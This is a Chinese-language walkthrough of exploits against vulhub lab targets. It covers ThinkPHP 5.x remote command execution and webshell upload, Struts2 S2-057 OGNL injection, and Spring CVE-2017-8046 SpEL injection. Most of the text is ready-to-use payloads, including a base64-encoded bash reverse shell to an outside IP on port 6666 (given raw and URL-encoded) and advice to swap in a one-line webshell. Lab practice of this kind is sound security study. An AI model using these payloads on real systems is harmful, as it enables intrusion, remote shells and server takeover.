一、Thinkphp(TP)
Thinkphp5x远程命令执行以及getshell
1.环境安装
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境
2.操作步骤
1.命令执行,我们直接在网址后面拼接:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami
我们就可以执行whoami命令
2.远程代码执行,在网址后面拼接:
? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
就可以执行远程代码执行
3.要想getshell只需要在网址后面拼接:
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php
这样就会在目录里面生成一个1.php文件,我们访问1.php就可以执行命令了,要想远程连接,只要将phpinfo()修改为一句话木马即可。
Struts2
1.环境安装
vulhub靶场
cd /vul-hub/struts2/s2-057
docker-compose up -d启动靶场
2.操作步骤
1.首先我们访问我们的靶机: http://靶机IP/struts2-showcase/
2.接着我们只需要输入:bash -i >& /dev/tcp/47.105.65.103/6666 0>&1,然后base64编码一下
4.然后我们将base64编码过的反弹shell命令粘贴在以下代码中。然后将代码进行url编码。
${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -c {echo,反弹shell命令粘贴处}|{base64,-d}|{bash,-i}')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
5.然后在一个机器上打开监听
6.然后将以下代码拼接在网址后面,执行aaaaaaaaaaaaaaaaaaa
/struts2-showcase/%24%7B%0A%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC80Ny4xMDUuNjUuMTAzLzY2NjYgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
7.返回监听的机器,看到成功反弹到了shell
Spring
1.环境安装
vulhub靶场 /spring/CVE-2017-8046
2.操作步骤
1.访问:http://47.105.65.103:8080/customers/1
2.刷新页面然后打开burpsuite抓包,然后按照图片中修改抓到的包。
请求数据:
[{ "op": "replace"
,
"path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new
byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname"
,
"value":
"vulhub" }]3.然后我们进入我们的靶场然后查看tmp目录下就会出现一个success文件。
